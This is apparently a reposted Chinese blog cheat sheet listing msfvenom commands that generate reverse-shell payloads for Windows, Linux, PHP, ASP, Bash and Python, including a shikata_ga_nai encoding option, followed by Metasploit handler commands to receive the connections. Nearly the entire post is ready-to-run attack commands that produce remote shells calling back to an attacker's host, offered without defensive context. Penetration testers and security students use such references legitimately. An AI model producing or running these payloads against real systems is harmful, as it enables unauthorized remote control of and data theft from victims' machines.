zoukankan      html  css  js  c++  java
  • msf反弹

    转载https://www.cnblogs.com/xishaonian/p/7721584.html

    msf 生成反弹 Windows Shell

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.62.129 lport=1234 -f exe -a x86 --platform win -o shell.exe

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe

    msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "x00" -a x86 --platform win -f c

    msf 生成在反弹linux Shell

    msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip地址 lport=端口 -e -f elf -a x86 --platform linux -o shell

    msf 生成反弹 PHP Shell

    msfvenom -p php/meterpreter_reverse_tcp lhost=IP地址 lport=端口 -o shell.php

    add <?php at the beginning

    perl -i~ -0777pe's/^/<?php /' shell.php

    msf 生成反弹 Bash Shell

    msfvenom -p cmd/unix/reverse_bash lhost=IP地址 lport=端口 -o shell.sh

    msf 生成反弹 ASP Shell

    msfvenom -p windows/meterpreter/reverse_tcp lhost=IP地址 lport=端口 -f asp -a x86 --platform win -o shell.asp

    msf 生成反弹 Python Shell

    msfvenom -p cmd/unix/reverse_python lhost=ip地址 lport=端口-o shell.py

    msf 生成反弹 Shell (C Shellcode)

    msfvenom -p windows/shell_reverse_tcp lhost=IP地址 lport=端口 -b "x00x0ax0d" -a x86 --platform win -f c

    msf监听

    1 use exploit/multi/handler

    2 set payload windows/meterpreter/reverse_tcp

    3 set LHOST 192.168.1.111

    4 Exploit



  • 相关阅读:
    Eleven-面向对象进阶
    Ten-面向对象
    Nine-常用模块
    Eight-内置函数和匿名函数
    Seven-递归函数和装饰器函数
    Six-迭代器和生成器
    Five-函数
    Four-深浅copy和文件操作
    Third-基础数据类型
    Second-基础
  • 原文地址:https://www.cnblogs.com/bingtang123/p/13385507.html
Copyright © 2011-2022 走看看